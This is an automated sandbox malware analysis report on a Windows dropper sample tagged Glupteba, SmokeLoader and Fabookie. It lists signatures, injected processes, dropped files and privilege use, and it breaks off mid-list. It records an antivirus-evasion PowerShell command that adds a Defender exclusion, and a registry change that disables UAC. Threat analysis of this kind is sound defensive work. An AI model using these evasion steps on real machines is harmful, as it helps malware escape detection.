Malware Analysis Report

2025-01-02 09:18

Sample ID 231006-hb3xzsbf45
Target 9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1
SHA256 9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1
Tags
upx fabookie glupteba smokeloader pub1 backdoor discovery dropper evasion loader spyware stealer themida trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1

Threat Level: Known bad

The file 9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1 was found to be: Known bad.

Malicious Activity Summary

upx fabookie glupteba smokeloader pub1 backdoor discovery dropper evasion loader spyware stealer themida trojan

Glupteba payload

Glupteba

Detect Fabookie payload

SmokeLoader

Fabookie

UAC bypass

Downloads MZ/PE file

Stops running service(s)

Loads dropped DLL

UPX packed file

Themida packer

Reads user/profile data of web browsers

Executes dropped EXE

Drops startup file

Looks up external IP address via web service

Checks installed software on the system

Checks whether UAC is enabled

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Runs net.exe

System policy modification

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-06 06:34

Signatures

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-06 06:34

Reported

2023-10-06 06:37

Platform

win10-20230915-en

Max time kernel

17s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe N/A

Downloads MZ/PE file

Stops running service(s)

evasion

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eCI4ZbiIpn5VOdsGVJSM0wpf.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bbmcKfXQ2NbsVXHwNlDv1fJJ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdVWpjCCJkGNnOeWusV6cqkC.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mNecwJ4k4SKcZG0JiWQXIWDO.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CmovzbGk0GmUdOkxd9Kf1HrH.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cPyjXow5GhJ3MpUT5ZNQ0x94.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\27fWKlRgGQLhrkeHLFBrv8bi.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lWFKf1hy3BS7hwTi1rvRBt6h.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UcOk4WCAlSlS2nsRjifsPMKF.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ELfULpLWlcR8PxM1GzGn7SeA.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vg91iSKtnzH3riPPDtdt0YKL.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SG112RvS1FqKPmOZHWQW4SsE.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe N/A
N/A N/A C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe N/A
N/A N/A C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp N/A
N/A N/A C:\Users\Admin\Pictures\njkrTFrTho9m8pktYQyvD45u.exe N/A
N/A N/A C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe N/A
N/A N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe N/A
N/A N/A C:\Users\Admin\Pictures\cyyky2Es1gtRl2hQuenXn5si.exe N/A
N/A N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe N/A
N/A N/A C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-25HDM.tmp\98JN9KmVPfWhTtr0EFitFYHD.tmp N/A
N/A N/A C:\Program Files (x86)\OSNMount\OSNMount.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\VFgTu512tXVIxQh4rRtDUZ98.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-G0HM1.tmp\XZ4N3CmViIlQO9eomkdjBjg2.tmp N/A
N/A N/A C:\Users\Admin\Pictures\7Y6Mk73rBSOq4GYoZJ1pwpg0.exe N/A
N/A N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe N/A
N/A N/A C:\Program Files (x86)\OSNMount\OSNMount.exe N/A
N/A N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe N/A
N/A N/A C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe N/A
N/A N/A C:\Users\Admin\Pictures\54hLtST1w78WuT9Iw4O0oErf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TPBS9.tmp\_isetup\_setup64.tmp N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4480 set thread context of 2952 N/A C:\Windows\system32\schtasks.exe C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\OSNMount\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp N/A
File created C:\Program Files (x86)\OSNMount\is-2OTBQ.tmp C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp N/A
File created C:\Program Files (x86)\OSNMount\is-VN75V.tmp C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp N/A
File created C:\Program Files (x86)\OSNMount\is-84DT2.tmp C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp N/A
File created C:\Program Files (x86)\OSNMount\is-MF3LP.tmp C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp N/A
File opened for modification C:\Program Files (x86)\OSNMount\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp N/A
File created C:\Program Files (x86)\OSNMount\is-I2OSM.tmp C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp N/A
File created C:\Program Files (x86)\OSNMount\is-GIF4Q.tmp C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp N/A
File opened for modification C:\Program Files (x86)\OSNMount\OSNMount.exe C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3432 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3432 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3432 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3432 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3432 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3432 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3432 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3432 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3432 wrote to memory of 4060 N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3432 wrote to memory of 4060 N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3432 wrote to memory of 4060 N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3432 wrote to memory of 4060 N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3432 wrote to memory of 4060 N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4060 wrote to memory of 4480 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\system32\schtasks.exe
PID 4060 wrote to memory of 4480 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\system32\schtasks.exe
PID 4060 wrote to memory of 4480 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\system32\schtasks.exe
PID 4060 wrote to memory of 2348 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe
PID 4060 wrote to memory of 2348 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe
PID 4060 wrote to memory of 2348 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe
PID 4060 wrote to memory of 2004 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe
PID 4060 wrote to memory of 2004 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe
PID 4060 wrote to memory of 2004 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe
PID 4060 wrote to memory of 4916 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe
PID 4060 wrote to memory of 4916 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe
PID 4060 wrote to memory of 4916 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe
PID 2348 wrote to memory of 3880 N/A C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp
PID 2348 wrote to memory of 3880 N/A C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp
PID 2348 wrote to memory of 3880 N/A C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp
PID 4060 wrote to memory of 4316 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\njkrTFrTho9m8pktYQyvD45u.exe
PID 4060 wrote to memory of 4316 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\njkrTFrTho9m8pktYQyvD45u.exe
PID 4060 wrote to memory of 4316 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\njkrTFrTho9m8pktYQyvD45u.exe
PID 4060 wrote to memory of 3852 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe
PID 4060 wrote to memory of 3852 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe
PID 4060 wrote to memory of 3852 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe
PID 4060 wrote to memory of 3800 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe
PID 4060 wrote to memory of 3800 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe
PID 4060 wrote to memory of 3800 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe
PID 4060 wrote to memory of 4456 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\cyyky2Es1gtRl2hQuenXn5si.exe
PID 4060 wrote to memory of 4456 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\cyyky2Es1gtRl2hQuenXn5si.exe
PID 3800 wrote to memory of 2164 N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe
PID 3800 wrote to memory of 2164 N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe
PID 3800 wrote to memory of 2164 N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe
PID 4060 wrote to memory of 3992 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe
PID 4060 wrote to memory of 3992 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe
PID 4060 wrote to memory of 3992 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe
PID 3852 wrote to memory of 4844 N/A C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe C:\Users\Admin\AppData\Local\Temp\is-25HDM.tmp\98JN9KmVPfWhTtr0EFitFYHD.tmp
PID 3852 wrote to memory of 4844 N/A C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe C:\Users\Admin\AppData\Local\Temp\is-25HDM.tmp\98JN9KmVPfWhTtr0EFitFYHD.tmp
PID 3852 wrote to memory of 4844 N/A C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe C:\Users\Admin\AppData\Local\Temp\is-25HDM.tmp\98JN9KmVPfWhTtr0EFitFYHD.tmp
PID 3880 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp C:\Windows\SysWOW64\net.exe
PID 3880 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp C:\Windows\SysWOW64\net.exe
PID 3880 wrote to memory of 3444 N/A C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp C:\Windows\SysWOW64\net.exe
PID 3880 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp C:\Program Files (x86)\OSNMount\OSNMount.exe
PID 3880 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp C:\Program Files (x86)\OSNMount\OSNMount.exe
PID 3880 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp C:\Program Files (x86)\OSNMount\OSNMount.exe
PID 3800 wrote to memory of 936 N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\VFgTu512tXVIxQh4rRtDUZ98.exe
PID 3800 wrote to memory of 936 N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\VFgTu512tXVIxQh4rRtDUZ98.exe
PID 3800 wrote to memory of 936 N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\VFgTu512tXVIxQh4rRtDUZ98.exe
PID 3992 wrote to memory of 2412 N/A C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe C:\Users\Admin\AppData\Local\Temp\is-G0HM1.tmp\XZ4N3CmViIlQO9eomkdjBjg2.tmp
PID 3992 wrote to memory of 2412 N/A C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe C:\Users\Admin\AppData\Local\Temp\is-G0HM1.tmp\XZ4N3CmViIlQO9eomkdjBjg2.tmp
PID 3992 wrote to memory of 2412 N/A C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe C:\Users\Admin\AppData\Local\Temp\is-G0HM1.tmp\XZ4N3CmViIlQO9eomkdjBjg2.tmp
PID 4060 wrote to memory of 716 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\7Y6Mk73rBSOq4GYoZJ1pwpg0.exe
PID 4060 wrote to memory of 716 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\7Y6Mk73rBSOq4GYoZJ1pwpg0.exe
PID 3800 wrote to memory of 2228 N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe
PID 3800 wrote to memory of 2228 N/A C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe

"C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\9d0ed01a625165d3d974f018400f6ffb354b1151ab6dfde032f49c0bdd5707d1.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe

"C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe"

C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe

"C:\Users\Admin\Pictures\Dnj9wCSMo3RlVWDcjVwth586.exe"

C:\Users\Admin\Pictures\njkrTFrTho9m8pktYQyvD45u.exe

"C:\Users\Admin\Pictures\njkrTFrTho9m8pktYQyvD45u.exe"

C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp
